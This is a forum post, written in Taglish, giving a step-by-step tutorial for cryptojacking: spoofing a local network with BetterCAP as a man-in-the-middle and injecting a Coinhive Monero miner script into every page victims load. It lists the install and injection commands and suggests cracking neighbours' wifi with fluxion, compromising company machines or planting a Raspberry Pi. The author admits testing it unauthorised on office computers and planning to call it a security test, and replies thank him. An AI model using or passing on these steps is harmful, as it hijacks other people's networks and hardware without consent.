- Messages
- 419
- Reaction score
- 0
- Points
- 26
I DID NOT POST THIS TO "WEBOFFERS" SIMPLY BECAUSE I WANT TO LEARN NOT EARN!
Na curious lang ako about dito Is The Pirate Bay’s In-Browser Cryptocurrency Mining Better Than Its Crappy Ads?. So ayun i tinry ko lang gamit ang BetterCAP (Man in the Middle) + Coinhive (Monero JavaScript Mining).
What is MitM? wikipedia
Scenario:
Kapag nakakonek tayo sa isang network (home network, pulic wifi, network ng kapitbahay, lan sa compshop, network sa office/school), e spoof natin ung router/switch nila, kumbaga kunwari tayo ung swith/router nila, then satin dadaan ung mga packets or network traffic nila, then once na nag browse sila sa internet or nagrequest sila ng website, e iinject natin ung javascript natin, then bawat visit nila sa website e, nag ma-mine sila para sa atin.
Requirements:
- access to target network
- macOS or GNU/Linux (any)
- macOS X 10.10.3 (dito ko talaga dineploy, eto kasi pinaka accessible at availabe na unit sa target network ko e)
- ubuntu 16.04 (tried, tested and recommended)
- vmware + ubuntu 16.04 (make sure lang na bridged ung network connection sa physical network)
- kali (not tested but will probably work, i do not recommend using kali, why? spoonfeed? pano ka matututo kung puro spoonfeed?)
- ruby (one of my favorite programming language, make sure installed na, kung hindi pa see this link)
- javascript miner (download here)
1.Install betterCAP
Code:
sudo apt-get install build-essential ruby-dev libpcap-dev
gem install bettercap
2. Verify your account. Just follow the instructions.
3. Go to Settings > Sites & API Keys https://coinhive.com/settings/sites
4. Copy mo ung public key.
5. Download mo ung script. Edit mo then paste mo ung key mo dun.
6. Gain access to your target network.
7. Inject natin ung script sa mga websites na bibisitahin ng mga target natin.Kung kapit bahay mo yan, try mo e hack ung wifi nila gamit ung fluxion. Kung may computer shop ka, mas ok edi kapag nag browse lang sila sa internet dun lang sila nag mamine. Kung malaking company yan, e hack mo isang unit nila, tapos dun mo e deploy. Kung gusto mo bili ka pa ng raspberry pi, dun mo e deploy. Bahala ka kung pano, basta meron kang access sa target network mo.
Code:
sudo bettercap --proxy-module injectjs --js-file miner.js
Conclusion:
Nung nag test muna ako sa bahay / sariling network. Sa unit ko na amd a6, average 7-10 h/s. Kung i7 mas mataas hash rate nyan syempre.
Sa office namen, meron kaming around 25-30 units cguro. Ung expected ko around 200-300 h/s. Kaso average lang ay 70-100 h/s. Syempre, hindi naman pala sila lahat laging nag babrowse sa internet at kalahati cguro ng mga unit namin 10 years old na. Tinry ko lang sa office ng isang oras ne, since IT naman ako dun, pd ko naman sabihin na tinetest ko lang security ng system namin, kahit baba lang sahod ko dun, mahal ko parin company namin haha. USE ONLY ON NETWORKS YOU OWN / AUTHORIZED. ELSE USE AT YOUR OWN RISK.
Screenshot:
View attachment 327158
domo arigato!
Feedbacks:
OKAY na sir. napagana ko na. hindi ko ma install yung bettercap sa 17.
hindi ko rin na copy yung error. pero nag downgrade ulit ak osa 16LTS. gumana xa.
salamat ulit sa share. Keep it Up
Thanks sa info TS! Working sa website ko!
View attachment 1226644View attachment 1226644
View attachment 1226645
Hit Thanks!
Attachments
Last edited: